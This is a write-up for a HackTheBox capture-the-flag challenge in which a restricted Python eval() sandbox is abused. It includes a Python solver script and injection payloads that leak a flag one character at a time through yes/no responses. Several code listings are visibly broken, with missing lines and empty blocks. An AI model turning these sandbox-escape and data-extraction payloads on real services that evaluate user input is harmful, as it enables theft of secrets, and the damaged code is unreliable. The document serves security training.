Created: Oct 20, 2023

[HackTheBox Write-Up: Type Exception]

Let's start with the context to understand this task and its solution. The task is a CTF challenge (Capture The Flag), commonly used for testing skills in information security. The primary objective is to extract the "flag," which is a hidden string.

General Overview of the Task

  • We have server-side Python code that accepts a string from the user.
  • This string is checked against a set of conditions.
  • If the string meets all the conditions, it is passed to the eval() function for execution.
  • We need to extract the hidden "flag" stored in a variable.

Now, let's look at the challenge code in more detail.

import re
with open("./flag.txt") as f:
    FLAG =
BLACKLIST = '"%&\',-/_:;@\\`{|}~*<=>[] \t\n\r\x0b\x0c'

def check_balanced(s):
    stack = []
    for i in s:
        if i in OPEN_LIST:
        elif i in CLOSE_LIST:
            pos = CLOSE_LIST.index(i)
            if ((len(stack) > 0) and
                    (OPEN_LIST[pos] == stack[len(stack)-1])):
                return False
    return len(stack) == 0

def check(s):
  if re.match(r"[a-zA-Z]{4}", inp):
    print("You return home.")
  elif len(set(re.findall(r"[\W]", inp))) > 4:
    print(set(re.findall(r"[\W]", inp)))
    print("A single man cannot bear the weight of all those special characters. You return home.")
    return all(ord(x) < 0x7f for x in s) and all(x not in s for x in BLACKLIST) and check_balanced(s)

def safe_eval(s, func):
    if not check(s):
        print("\U0001F6B6" + "\U0001F6B6" + "\U0001F6B6")
            print(eval(f"{func.__name__}({s})", {"__builtins__": {func.__name__: func}, "flag": FLAG}))
if __name__ == "__main__":
    while True:
        inp = input("Input : ")
        safe_eval(inp, type)

First up, the function “check_balanced” scrutinizes the string to ensure that the opening and closing brackets are properly aligned, returning a True or False based on the outcome. Next in line, the function “check” performs a triple-threat analysis on the input string: it verifies that the string kicks off with four letters; tallies up the number of unique special characters, capping them at four; and finally, ensures that all characters are ASCII-approved, not on the blacklist. Last but not least, the function “safe_eval” serves as the gateway for code injection and the last line of defense, executing the code only after a successful vetting by the “check” function, limiting access to specific functions and the FLAG variable, and then sits tight, awaiting the next input in an endless loop.

So, what are our constraints?

  • Symbol Restrictions: We can't use certain symbols, including spaces, commas, and colons. This means standard Python constructs like “if x == y” can't be used directly.
  • Unique Symbol Limit: No more than 4 unique symbols are allowed in the string, e.g., the string “((()))” has only two unique symbols: “(“ and “)”. This narrows down our choice of operators and functions.
  • Exception Handling: All exceptions are caught by the server and returned as "Error." This means we need to be particularly cautious with code that could throw an exception.
  • Limited eval Context: Only the type function and the flag variable are accessible, meaning functions and classes like list, print, set, str, dir, etc., are not available.
  • Parentheses: They must be paired. “()” is acceptable; “)(“ is not.

And what can we do?

  • Allowed Symbols: The allowed symbols are !#$()+.?^.
  • Replace == with is: We can use “is” instead of “==” for comparison.
  • Use Hexadecimal Numbers: To circumvent symbol restrictions, we can use hexadecimal numbers to represent characters.
  • Class Restriction Workaround: The list class is restricted, but we can do type(flag.split()) to create a list instance.
  • Types as Responses: If the code works, the type of the result will be output. For example, 1 will return .

Let's Get to the Solution

It's not a solution in a couple of lines of code. In it, we will use several loops to extract the flag, and brute force will take additional time. You can see the full solution here.

import socket
import string
import time
from collections import defaultdict
from enum import Enum

class Answer(Enum):
    NO = 0
    YES = 1
    ERROR = 2
if_construction = "(1)if({check})else(None)"

def netcat(content) -> Answer:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("", 1337))
    answer = None
    while True:
        data = s.recv(1024)
        if len(data) == 0:
        if b"<class 'NoneType'>" in data:
            answer = Answer.NO
        if b"<class 'int'>" in data:
            answer = Answer.YES
        if b"Error" in data:
            answer = Answer.ERROR
    return answer

def find_first_index(character, occupied):
    print("Finding first index: ", end="")
    for index in range(100):
        if index in occupied:
        print(".", end="")
        first_index_check = if_construction.format(check=f"flag.encode().index({character})is({index})").encode()
        result = netcat(first_index_check)
        if result == Answer.YES:
            print(f" {index}")
            return index
        if result == Answer.ERROR:
            print("Not used")
            return None
    return None

def find_last_index(character, start, occupied):
    print("Finding last index ", end="")
    for index in range(100):
        if index <= start:
        if index in occupied:
        print(".", end="")
        last_index_check = if_construction.format(check=f"flag.encode().rindex({character})is({index})").encode()
        result = netcat(last_index_check)
        if result == Answer.YES:
            print(f" {index}")
            return index
    return None

def find_in_between(character: str, first_index: int, last_index: int, count: int, occupied: list[int]) -> list[int]:
    print(f'Searching for {count - 2} indexes between {first_index} and {last_index}: ', end="")
    if (last_index - first_index + 1) == count:
        # case when unknown indexes are left just in between two edge indexes
        found_indexes = list(range(first_index + 1, last_index))
        print(", ".join(map(str, found_indexes)))
        return found_indexes
    # We need a list class to convert a generator to a list
    list_class = "type(flag.split())"
    # "regular" generator that iterates over flag symbols
    flag_generator = "((i)for(i)in(flag.encode()))"
    # converting generator to a list
    flag_list = f"{list_class}({flag_generator})"
    found_indexes = []
    for char_index in range(first_index + 1, last_index):
        if char_index in occupied:
            # this index contains already-known character
        if len(found_indexes) + 2 == count:
            # all indexes for this char were found .no need to check other
        print(".", end="")
        check_index = if_construction.format(check=f"{flag_list}.pop({char_index})is({character})").encode()
        result = netcat(check_index)
        if result == Answer.YES:
            print(f" {char_index}", end="")
    return found_indexes

def find_count(character):
    print("Finding count ", end="")
    for count in range(1, 20):
        print(".", end="")
        check_count = if_construction.format(check=f"flag.encode().count({character})is({count})").encode()
        result = netcat(check_count)
        if result == Answer.YES:
            print(f" {count}")
            return count
    return None
if __name__ == "__main__":
    start_time = time.time()
    occupied_indexes = []
    found_chars = defaultdict(dict)
    for char_str in string.printable:
        char_hex = hex(ord(char_str))
        print(f"\nChecking <{char_str} {char_hex}>")
        # Checking
        first_index = find_first_index(char_hex, occupied_indexes)
        if first_index is None:
            # This character is not present in flag
        found_chars[char_str]["indexes"] = [first_index]
        # Checking how many duplicates of this character are in the flag
        count = find_count(char_hex)
        found_chars[char_str]["count"] = count
        # If a character occurred more than once, then we can find its index from the end
        if count > 1:
            last_index = find_last_index(char_hex, first_index, occupied_indexes)
            # If the character occurred more than 2 times, then we can find other occurrences between the first and last known index
            if count > 2:
                indexes = find_in_between(char_hex, first_index, last_index, count, occupied_indexes)
                found_chars[char_str]["indexes"] += indexes
                occupied_indexes += indexes
    indexes = []
    # Just converting dict with indexed in the list that can be then sorted to join into the final string
    for char_str, char_data in found_chars.items():
        for index in char_data["indexes"]:
            indexes.append((index, char_str))
    indexes.sort(key=lambda data: data[0])
    flag = "".join(char_str for _, char_str in indexes)
    print(f"Finished in {round(time.time() - start_time)} sec.")

First Step

We kick off by checking for the letter 'A' (hex '0x41') in the flag string and whether it's at index 0.

Injection: (1)if(flag.encode().index(0x41)is(0))else(None)  

Readable: 1 if flag.encode().index(0x41) is 0 else None  

Server responses: an integer means it's at index 0; 'NoneType' means it's elsewhere; 'Error' means it's not in the string at all.

Second Step

We count how many times 'A' (hex '0x41') appears in the string.

Injection: (1)if(flag.encode().count(0x41)is(1))else(None)  

Readable: 1 if flag.encode().count(0x41) is 1 else None  

Server responses: an integer confirms the count; 'NoneType' means try again.

Third Step

We've found the first index for each character; now we look for the last index.

Injection: (1)if(flag.encode().rindex(0x41)is(0))else(None)  

Readable: 1 if flag.encode().rindex(0x41) is 0 else None  

Note: Upon reflection, this step may be redundant as knowing the first index and count suffices.

Fourth Step

We brute-force the remaining characters that appear more than twice.

Injection: (1)if(type(flag.split())(((i)for(i)in(flag.encode()))).pop(1)is(0x41))else(None)  

Readable: 1 if type(flag.split())(i for i in flag.encode()).pop(1) is 0x41 else None  

How it works:

  1. type(flag.split()) creates a list since 'list' class isn't in the eval context.
  2. (i)for(i)in(flag.encode()) turns the string into an iterator, which we convert to a list.
  3. .pop({char_index})is({character}) extracts the element at the index and compares it to our ASCII characters.

This way, we can efficiently brute-force the remaining unknown indices in the string and uncover the flag string, one index at a time.